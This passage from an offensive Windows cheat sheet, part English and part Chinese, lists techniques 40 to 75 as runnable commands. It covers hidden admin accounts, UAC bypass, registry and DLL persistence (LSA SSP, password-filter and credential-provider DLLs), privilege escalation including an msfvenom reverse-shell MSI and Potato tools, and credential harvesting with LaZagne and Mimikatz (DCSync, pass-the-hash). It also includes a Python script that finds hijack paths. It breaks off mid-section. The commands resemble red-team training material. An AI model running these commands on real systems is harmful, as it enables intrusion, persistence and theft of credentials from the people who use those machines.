## 40. Hidden User Account

**TTP:** T1136.001 + T1564.002 | **Admin:** ✅ | **APT:** APT33, OilRig, Lazarus Group

```
net user WinlogonService Password123 /add
net localgroup "Administrators" /add WinlogonService
net localgroup "Remote Desktop Users" /add WinlogonService
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WinlogonService /t REG_DWORD /d 0 /f
# Cleanup
net user WinlogonService /del
```

## 41. fodhelper UAC Bypass

**TTP:** T1548.002 | **Admin:** ❌ | **APT:** APT29, APT41, Turla

```
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "{path}" /f
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f
start C:\Windows\System32\fodhelper.exe
whoami /groups | findstr "High"
# Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f
```

## 42. WSL Persistence

**TTP:** T1059.004 | **Admin:** ❌ | **APT:** Custom / red team

```
# bashrc (every WSL terminal)
echo "cmd.exe /c C:\\path\\to\\{implant}.exe" >> ~/.bashrc
# cron (on reboot)
crontab -e
# @reboot cmd.exe /c C:\\path\\to\\{implant}.exe
# profile (login shell)
echo "cmd.exe /c C:\\path\\to\\{implant}.exe" >> ~/.profile
```

## 43. DPAPI CurrentUser Registry Loader

**TTP:** T1027.013 | **Admin:** ❌ | **APT:** APT28, APT29, Lazarus Group

```
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$encrypted = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$encBase64 = [Convert]::ToBase64String($encrypted)
reg add "HKCU\Software\Microsoft\WindowsUpdate" /v "CfgData" /t REG_SZ /d $encBase64 /f
# Loader
$encBase64 = (Get-ItemProperty "HKCU:\Software\Microsoft\WindowsUpdate").CfgData
$encBytes = [Convert]::FromBase64String($encBase64)
$decBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encBytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$implantPath = [System.Text.Encoding]::UTF8.GetString($decBytes)
Start-Process $implantPath
# Cleanup
reg delete "HKCU\Software\Microsoft\WindowsUpdate" /v CfgData /f
```

## 44. DPAPI Machine Scope

**TTP:** T1027.013 | **Admin:** ✅ | **APT:** APT28, APT29

```
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$encrypted = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::LocalMachine)
$encBase64 = [Convert]::ToBase64String($encrypted)
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\Cfg" /v "SvcBlob" /t REG_SZ /d $encBase64 /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\WindowsNT\Cfg" /f
```

## 45. AES-Encrypted Registry Loader

**TTP:** T1027.013 | **Admin:** ❌ | **APT:** Lazarus Group, APT41

```
$key = [System.Security.Cryptography.Aes]::Create()
$key.KeySize = 256; $key.GenerateKey(); $key.GenerateIV()
$plainBytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$enc = $key.CreateEncryptor()
$encBytes = $enc.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
reg add "HKCU\Software\Microsoft\Sync" /v "Payload" /t REG_SZ /d ([Convert]::ToBase64String($encBytes)) /f
reg add "HKCU\Software\Microsoft\Sync" /v "K" /t REG_SZ /d ([Convert]::ToBase64String($key.Key)) /f
reg add "HKCU\Software\Microsoft\Sync" /v "I" /t REG_SZ /d ([Convert]::ToBase64String($key.IV)) /f
# Loader
$payload = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").Payload)
$K = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").K)
$I = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").I)
$aes = [System.Security.Cryptography.Aes]::Create(); $aes.Key = $K; $aes.IV = $I
$dec = $aes.CreateDecryptor()
$decBytes = $dec.TransformFinalBlock($payload, 0, $payload.Length)
Start-Process ([System.Text.Encoding]::UTF8.GetString($decBytes))
# Cleanup
reg delete "HKCU\Software\Microsoft\Sync" /f
```

## 46. XOR + DPAPI + RunKey (Full Combination)

**TTP:** T1027 + T1547.001 | **Admin:** ❌ | **APT:** APT28, APT29, Lazarus Group

```
# XOR Obfuscation
function XorBytes($data, $key) {
    $out = New-Object byte[] $data.Length
    for ($i = 0; $i -lt $data.Length; $i++) { $out[$i] = $data[$i] -bxor $key[$i % $key.Length] }
    return $out
}
$path = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$xorKey = [System.Text.Encoding]::UTF8.GetBytes("M4n1k4nd4n")
$xored = XorBytes $path $xorKey
reg add "HKCU\Software\Microsoft\EdgeUpdate" /v "Blob" /t REG_SZ /d ([Convert]::ToBase64String($xored)) /f
reg add "HKCU\Software\Microsoft\EdgeUpdate" /v "K" /t REG_SZ /d "M4n1k4nd4n" /f
# DPAPI + RunKey
$loaderScript = @'
Add-Type -AssemblyName System.Security
$enc = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Cfg").Data)
$dec = [System.Security.Cryptography.ProtectedData]::Unprotect($enc,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Start-Process ([System.Text.Encoding]::UTF8.GetString($dec))
'@
$loaderScript | Out-File "C:\ProgramData\loader.ps1" -Encoding UTF8
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$enc = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
reg add "HKCU\Software\Microsoft\Cfg" /v "Data" /t REG_SZ /d ([Convert]::ToBase64String($enc)) /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "CfgSvc" /t REG_SZ /d "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\ProgramData\loader.ps1" /f
# Cleanup
reg delete "HKCU\Software\Microsoft\EdgeUpdate" /f
reg delete "HKCU\Software\Microsoft\Cfg" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CfgSvc /f
del "C:\ProgramData\loader.ps1"
```

## DLL-Based Persistence Techniques

## 47. AppInit_DLLs

**TTP:** T1546.010 | **Admin:** ✅ | **APT:** Turla, APT29

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f
:: Cleanup
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0 /f
```

## 48. COM DLL Hijack (HKCU Override)

**TTP:** T1546.015 | **Admin:** ❌ | **APT:** APT28, Turla, BRONZE BUTLER

```
reg add "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f
:: Cleanup
reg delete "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}" /f
```

## 49. Service DLL - svchost.exe

**TTP:** T1543.003 | **Admin:** ✅ | **APT:** APT28, Lazarus Group, FIN7, Carbanak

```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v Type /t REG_DWORD /d 32 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v Start /t REG_DWORD /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v ObjectName /t REG_SZ /d "LocalSystem" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v FakeGroup /t REG_MULTI_SZ /d "FakeSvc" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v ImagePath /t REG_EXPAND_SZ /d "%SystemRoot%\System32\svchost.exe -k FakeGroup" /f
sc start FakeSvc
:: Cleanup
sc stop FakeSvc && sc delete FakeSvc
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v FakeGroup /f
```

## 50. Winlogon Notification Package DLL

**TTP:** T1547.004 | **Admin:** ✅ | **APT:** APT28, Turla, PLATINUM

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /v DllName /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /v Logon /t REG_SZ /d "WinlogonLogonEvent" /f
:: Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /f
```

## 51. LSA Security Support Provider (SSP) DLL

**TTP:** T1547.005 | **Admin:** ✅ | **APT:** Turla, APT28, PLATINUM

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0payload" /f
copy "C:\lab\payload.dll" "C:\Windows\System32\payload.dll"
:: Restore
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u" /f
```

## 52. rundll32 + RunKey (Reflective DLL)

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** FIN7, Carbanak

```
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SyncSvc" /t REG_SZ /d "rundll32.exe C:\lab\payload.dll,EntryPoint" /f
:: Cleanup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v SyncSvc /f
```

## 53. Scheduled Task - rundll32 DLL

**TTP:** T1053.005 | **Admin:** ❌ | **APT:** APT41, Lazarus Group

```
schtasks /create /tn "WinSyncDLL" /sc onlogon /tr "rundll32.exe C:\lab\payload.dll,main" /f
schtasks /query /tn "WinSyncDLL" /fo LIST /v
# Cleanup
schtasks /delete /tn "WinSyncDLL" /f
```

## 54. Phantom DLL Hijack

**TTP:** T1574.001 | **Admin:** ❌ | **APT:** APT41, Lazarus Group, PowerGhost

```
Copy-Item "C:\lab\payload.dll" "$env:LOCALAPPDATA\Microsoft\WindowsApps\wbemcomn.dll"
Copy-Item "C:\lab\payload.dll" "C:\Git\bin\version.dll"
$env:PATH -split ";"
# Cleanup
Remove-Item "$env:LOCALAPPDATA\Microsoft\WindowsApps\wbemcomn.dll" -ErrorAction SilentlyContinue
```

## 55. .NET Profiler DLL (COR_PROFILER)

**TTP:** T1574.012 | **Admin:** ❌ | **APT:** Lazarus Group, Turla

```
reg add "HKCU\Environment" /v COR_ENABLE_PROFILING /t REG_SZ /d "1" /f
reg add "HKCU\Environment" /v COR_PROFILER /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
reg add "HKCU\Environment" /v COR_PROFILER_PATH /t REG_SZ /d "C:\lab\payload.dll" /f
# Cleanup
reg delete "HKCU\Environment" /v COR_ENABLE_PROFILING /f
reg delete "HKCU\Environment" /v COR_PROFILER /f
reg delete "HKCU\Environment" /v COR_PROFILER_PATH /f
```

## 56. ETW Provider Hijack DLL

**TTP:** T1574 | **Admin:** ✅ | **APT:** Nation-state actors

```
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /v "MessageFileName" /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /v "ResourceFileName" /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
:: Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /f
```

## 57. AMSI Provider DLL

**TTP:** T1562.001 | **Admin:** ✅ | **APT:** Nation-state actors

```
$guid = "{CAFEBABE-1337-1337-1337-CAFEBABE1337}"
reg add "HKLM\SOFTWARE\Microsoft\AMSI\Providers\$guid" /ve /t REG_SZ /d "C:\lab\amsi_provider.dll" /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\AMSI\Providers\$guid" /f
```

## 58. Print Processor DLL

**TTP:** T1547.012 | **Admin:** ✅ | **APT:** Lazarus Group, APT28

```
copy "C:\lab\payload.dll" "C:\Windows\System32\spool\prtprocs\x64\evil_proc.dll"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" /v Driver /t REG_SZ /d "evil_proc.dll" /f
net stop spooler && net start spooler
:: Cleanup
net stop spooler
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" /f
del "C:\Windows\System32\spool\prtprocs\x64\evil_proc.dll"
net start spooler
```

## 59. Winsock LSP DLL

**TTP:** T1574 | **Admin:** ❌/✅ | **APT:** Custom / red team

```
netsh winsock add provider "C:\lab\lsp_payload.dll"
netsh winsock show catalog
netsh winsock remove provider <catalog-id>
netsh winsock reset   # nuclear
```

## 60. netsh Helper DLL

**TTP:** T1574.001 | **Admin:** ✅ | **APT:** Custom / red team

```
netsh add helper C:\lab\payload.dll
netsh show helper
:: Cleanup
netsh delete helper C:\lab\payload.dll
```

## 61. WMI Provider DLL

**TTP:** T1546.003 | **Admin:** ✅ | **APT:** APT29, Turla

```
reg add "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Both" /f
mofcomp.exe C:\lab\evil_provider.mof
# Cleanup
reg delete "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}" /f
```

## 62. Network Provider DLL

**TTP:** T1556.008 | **Admin:** ✅ | **APT:** APT28, Lazarus Group

```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP\NetworkProvider" /v Name /t REG_SZ /d "EvilNP" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP\NetworkProvider" /v ProviderPath /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" /v ProviderOrder /t REG_SZ /d "RDPNP,LanmanWorkstation,webclient,EvilNP" /f
:: Cleanup
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP" /f
```

## 63. Password Filter DLL (SAM)

**TTP:** T1556.002 | **Admin:** ✅ | **APT:** APT28, Lazarus Group

```
copy "C:\lab\payload.dll" "C:\Windows\System32\passfilt_evil.dll"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0passfilt_evil" /f
:: Restore
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli" /f
del "C:\Windows\System32\passfilt_evil.dll"
```

## 64. WinRT DLL Activation (HKCU)

**TTP:** T1574.002 | **Admin:** ❌ | **APT:** Custom / red team

```
$className = "Windows.UI.Notifications.ToastNotificationManager"
reg add "HKCU\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\$className" /v DllPath /t REG_SZ /d "C:\lab\payload.dll" /f
# Cleanup
reg delete "HKCU\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\$className" /f
```

## 65.
凭据提供程序 DLL **TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, Turla ``` copy "C:\lab\payload.dll" "C:\Windows\System32\evil_cp.dll" reg add "HKLM\SOFTWARE\Classes\CLSID\{EVILCP01-0000-0000-0000-000000000001}\InprocServer32" /ve /t REG_SZ /d "evil_cp.dll" /f reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{EVILCP01-0000-0000-0000-000000000001}" /ve /t REG_SZ /d "EvilCP" /f :: Cleanup reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{EVILCP01-0000-0000-0000-000000000001}" /f del "C:\Windows\System32\evil_cp.dll" ``` ## 66. Shell 扩展 DLL (右键菜单) **TTP:** T1574.001 | **管理员权限:** ❌ | **APT:** Turla, APT28 ``` $guid = "{SHELLEXT-1337-1337-1337-SHELLEXT13370}" reg add "HKCU\Software\Classes\*\shellex\ContextMenuHandlers\EvilMenu" /ve /t REG_SZ /d $guid /f reg add "HKCU\Software\Classes\CLSID\$guid\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved" /v $guid /t REG_SZ /d "EvilShellExt" /f # 清理 reg delete "HKCU\Software\Classes\*\shellex\ContextMenuHandlers\EvilMenu" /f reg delete "HKCU\Software\Classes\CLSID\$guid" /f ``` ## 67. 
DiagTrack DLL 劫持 **TTP:** T1574.002 | **管理员权限:** ❌ | **APT:** 自定义/红队 ``` Copy-Item "C:\lab\payload.dll" "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack" /v ExtensionDll /t REG_SZ /d "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll" /f # 清理 reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack" /v ExtensionDll /f Remove-Item "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll" ``` # — 权限提升 — ## 初始侦察 ``` whoami /all whoami /priv whoami /groups systeminfo hostname net user %username% net localgroup administrators ``` ## 自动化枚举工具 ``` # PrivescCheck Import-Module .\PrivescCheck.ps1 Invoke-PrivescCheck Invoke-PrivescCheck -Extended # PowerUp (PowerSploit) Import-Module .\PowerUp.ps1 Invoke-AllChecks # SharpUp .\SharpUp.exe audit # beRoot .\beRoot.exe # Windows Exploit Suggester systeminfo > sysinfo.txt python wes.py sysinfo.txt python wes.py sysinfo.txt --exploits-only ``` ## 68. 未加引号的服务路径 **TTP:** T1574.009 | **管理员权限:** ❌→✅ | **APT:** FIN7, APT41 ``` # 查找未加引号的服务路径 wmic service get name,pathname,startmode | findstr /i "auto" | findstr /iv "c:\windows" | findstr /iv '"' # 手动检查 sc qc # 如果路径 = C:\Program Files\My Service\service.exe (未加引号) # 将植入程序释放在:C:\Program.exe 或 C:\Program Files\My.exe copy {path} "C:\Program Files\My.exe" # 重启服务 / 重启系统 sc stop sc start # 清理 del "C:\Program Files\My.exe" ``` ## 69. 弱服务二进制文件权限 **TTP:** T1574.010 | **管理员权限:** ❌→✅ | **APT:** FIN7 ``` # 查找可写入的服务二进制文件 .\accesschk.exe -uwdqs "Users" "C:\Program Files" .\accesschk.exe -uwdqs "Everyone" "C:\Program Files" .\accesschk.exe -uwdqs "Users" "C:\Program Files (x86)" # 如果可写入:覆盖二进制文件 copy {path} "C:\Program Files\VulnService\service.exe" /y # 重启 sc stop VulnService && sc start VulnService # 清理 # 恢复原始二进制文件 ``` ## 70. 
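The candidate rule in technique 68 (`C:\Program.exe`, then `C:\Program Files\My.exe`) is the general CreateProcess behaviour for any unquoted path with spaces: each space-delimited prefix is tried, with `.exe` appended, before the real binary. The following Python is an added example, not code from this repository: it parses the output of `wmic service get name,pathname,startmode /format:csv` (the sample lines are constructed, not captured from a real host), applies the same filters as the `findstr` pipeline above (auto-start, not under `C:\Windows`, not quoted) and lists every drop location an attacker would try, plus, on the target host, which of those directories the current user can actually write to.

```python
"""Enumerate unquoted-service-path hijack candidates from wmic CSV output (added example)."""
import ntpath
import os

# Constructed sample of: wmic service get name,pathname,startmode /format:csv
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
LAB-PC,Dhcp,C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted,Auto
LAB-PC,VulnSvc,C:\Program Files\My Service\service.exe,Auto
LAB-PC,AgentSvc,C:\Vendor Tools\Agent Service\agent.exe --config agent.cfg,Auto
LAB-PC,SafeSvc,"C:\Program Files\Safe Corp\safe.exe",Auto
LAB-PC,ManualSvc,C:\Program Files\Manual Thing\m.exe,Manual
"""


def parse_wmic_csv(text):
    """Return (name, pathname, startmode) tuples from wmic /format:csv output.

    Node and Name never contain commas and StartMode is the last field, so splitting on the
    first two commas and the last one keeps any commas inside the service arguments intact.
    """
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue
        parts = line.split(",", 2)
        if len(parts) < 3:
            continue
        _node, name, rest = parts
        pathname, startmode = rest.rsplit(",", 1)
        rows.append((name, pathname.strip(), startmode.strip()))
    return rows


def hijack_candidates(pathname):
    """Binaries CreateProcess tries before the real executable of an unquoted path.

    For 'C:\\Program Files\\My Service\\service.exe' this is ['C:\\Program.exe',
    'C:\\Program Files\\My.exe']. Quoted paths, and paths whose executable part has no
    spaces (arguments after it do not matter), yield nothing.
    """
    if pathname.startswith('"'):
        return []
    tokens = pathname.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # this prefix is the real executable; later tokens are arguments
        candidates.append(prefix + ".exe")
    return candidates


def find_unquoted_auto_services(text, skip_windows=True):
    """Map vulnerable auto-start service names to their hijack candidate paths."""
    findings = {}
    for name, pathname, startmode in parse_wmic_csv(text):
        if startmode.lower() != "auto":
            continue
        if skip_windows and pathname.lower().startswith("c:\\windows"):
            continue
        candidates = hijack_candidates(pathname)
        if candidates:
            findings[name] = candidates
    return findings


def writable_drop_dirs(candidates):
    """Directories from the candidate list that exist and are writable by the current user.

    Only meaningful when run on the target Windows host; elsewhere the paths do not exist.
    """
    dirs = {ntpath.dirname(c) for c in candidates}
    return sorted(d for d in dirs if os.path.isdir(d) and os.access(d, os.W_OK))


if __name__ == "__main__":
    for svc, cands in find_unquoted_auto_services(SAMPLE_WMIC_CSV).items():
        print(f"{svc}: candidates {cands}; writable dirs {writable_drop_dirs(cands)}")
```

On a real engagement, feed it `wmic service get name,pathname,startmode /format:csv > services.csv` and replace `SAMPLE_WMIC_CSV` with the file contents; the `writable_drop_dirs` check is what separates a real finding from a path that merely looks bad (`C:\` and `C:\Program Files` are normally not writable by standard users, vendor directories sometimes are).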
## 70. Weak service registry permissions

**TTP:** T1574 | **Admin:** ❌→✅ | **APT:** APT28

```
# Check the ACLs on service registry keys
.\accesschk.exe -kwqs "Users" "HKLM\System\CurrentControlSet\Services"
.\accesschk.exe -kwqs "Authenticated Users" "HKLM\System\CurrentControlSet\Services"

# If a service key is writable, point its ImagePath at the implant (save the original value first)
reg query "HKLM\System\CurrentControlSet\Services\{service}" /v ImagePath
reg add "HKLM\System\CurrentControlSet\Services\{service}" /v ImagePath /t REG_EXPAND_SZ /d "{path}" /f
sc stop {service} && sc start {service}
```

## 71. AlwaysInstallElevated (MSI)

**TTP:** T1548 | **Admin:** ❌→✅ | **APT:** custom / red team

```
:: Check whether it is enabled (both values must be 1)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

:: Generate an MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f msi > evil.msi

:: Execute (the installer runs as SYSTEM)
msiexec /quiet /qn /i evil.msi
```

## 72. Token impersonation (PrintSpoofer / GodPotato)

**TTP:** T1134 | **Admin:** ❌→✅ | **APT:** custom / red team

```
# Check privileges
whoami /priv | findstr /i "SeImpersonate SeAssignPrimary SeBackup SeRestore SeTakeOwnership"

# PrintSpoofer (SeImpersonatePrivilege -> SYSTEM)
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "powershell -nop -w hidden -c {payload}"

# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c {path}"

# JuicyPotatoNG
.\JuicyPotatoNG.exe -t * -p {path}
```

## 73. DLL hijacking in SYSTEM services

**TTP:** T1574.001 | **Admin:** ❌→✅ | **APT:** APT41, Lazarus Group

```
# Find SYSTEM services that try to load a DLL that does not exist
# ProcMon filter: Process Name = {service}.exe | Result = NAME NOT FOUND | Path ends with .dll

# Find writable directories in the service's DLL search path
.\accesschk.exe -uwdqs "Users" "C:\Program Files\"

# Drop a malicious DLL with the missing name
copy {path} "C:\Program Files\{app}\missing.dll"

# Restart the service
sc stop {service} && sc start {service}
```

## 74. SeImpersonatePrivilege abuse

**TTP:** T1134.001 | **Admin:** ❌→✅ | **APT:** custom / red team

Typically applies to IIS application pool identities, SQL Server service accounts and meterpreter shells obtained through a web vulnerability.

```
whoami /priv
# If SeImpersonatePrivilege = Enabled
.\PrintSpoofer.exe -i -c "cmd /c whoami"
.\GodPotato.exe -cmd "whoami"

# Verify SYSTEM
whoami
```

## 75. Stored credential abuse

**TTP:** T1555 | **Admin:** ❌ | **APT:** APT33, OilRig

```
# List stored credentials
cmdkey /list
C:\Windows\System32\cmdkey.exe /list

# Use a stored credential with runas
runas /savecred /user:{domain}\{user} "cmd.exe"
runas /savecred /user:Administrator "powershell.exe -nop -w hidden"

# Check credential files
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\
dir /a %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\
```

# Post-Exploitation

## Credential hunting

```
# Winlogon autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Any "password" string in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Unattend / Sysprep (plaintext passwords)
dir /b /s C:\Windows\Panther\unattend.xml
dir /b /s C:\Windows\Panther\Unattend\
dir /b /s C:\Windows\System32\Sysprep\sysprep.xml
dir /b /s C:\Windows\System32\Sysprep\sysprep.inf

# File system search
dir /s /b *pass* *cred* *vnc* *config* 2>nul
dir /b /s web.config
dir /b /s unattend.xml

# String search inside files
findstr /si "password" *.xml *.ini *.txt *.config
findstr /si "secret" *.xml *.ini *.txt
findstr /si "cred" *.xml *.ini *.txt

# Dump the full file list and grep it (findstr takes a space-separated list of terms; it has no \| alternation)
dir C:\ /b /a /s > creds.txt
findstr /i "pass secret cred" creds.txt
```

## SessionGopher: session credential harvesting

```
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher                  # current host
Invoke-SessionGopher -Thorough        # deeper sweep
Invoke-SessionGopher -Target {host}   # remote host
Invoke-SessionGopher -AllDomain       # domain-wide (needs DA)
```

**Collects:** PuTTY, WinSCP, FileZilla, RDP and SuperPuTTY session credentials.

## LaZagne: multi-application password recovery

```
:: All modules
.\LaZagne.exe all

:: Specific modules
.\LaZagne.exe browsers
.\LaZagne.exe windows
.\LaZagne.exe wifi
.\LaZagne.exe mail
.\LaZagne.exe git
.\LaZagne.exe database

:: Write output
.\LaZagne.exe all -oN
.\LaZagne.exe all -oJ   :: JSON
```

**Targets:** Chrome, Firefox, Edge, Outlook, FileZilla, PuTTY, WiFi, Windows Vault, Git, SVN.
## psrecon: PowerShell reconnaissance framework

```
Import-Module .\PSRecon.ps1
Invoke-PSRecon

# or run it directly
powershell -ep bypass -f PSRecon.ps1
```

**Collects:** system information, users, groups, processes, services, network configuration, scheduled tasks, installed software, browser history, clipboard.

## Mimikatz: full command reference

```
:: Run as admin
mimikatz.exe

:: Enable debug privilege (required first)
privilege::debug

:: Elevate to SYSTEM
token::elevate

:: === CREDENTIAL DUMPING ===
:: Logon passwords (plaintext only if WDigest caching is enabled)
sekurlsa::logonpasswords
:: NTLM hashes only
sekurlsa::msv
:: Kerberos tickets
sekurlsa::tickets
:: Kerberos keys
sekurlsa::ekeys
:: WDigest plaintext
sekurlsa::wdigest
:: SAM dump (local hashes, needs SYSTEM)
lsadump::sam
:: LSA secrets
lsadump::secrets
:: LSA cache (domain cached credentials)
lsadump::cache
:: DCSync: dump any account (needs DA or replication rights)
lsadump::dcsync /user:Administrator
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:{domain} /all /csv

:: === ENABLE WDIGEST (plaintext on next logon) ===
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

:: === PASS-THE-HASH ===
sekurlsa::pth /user:Administrator /domain:. /ntlm:{hash} /run:cmd.exe
sekurlsa::pth /user:{user} /domain:{domain} /ntlm:{hash} /run:"powershell -nop"

:: === PASS-THE-TICKET ===
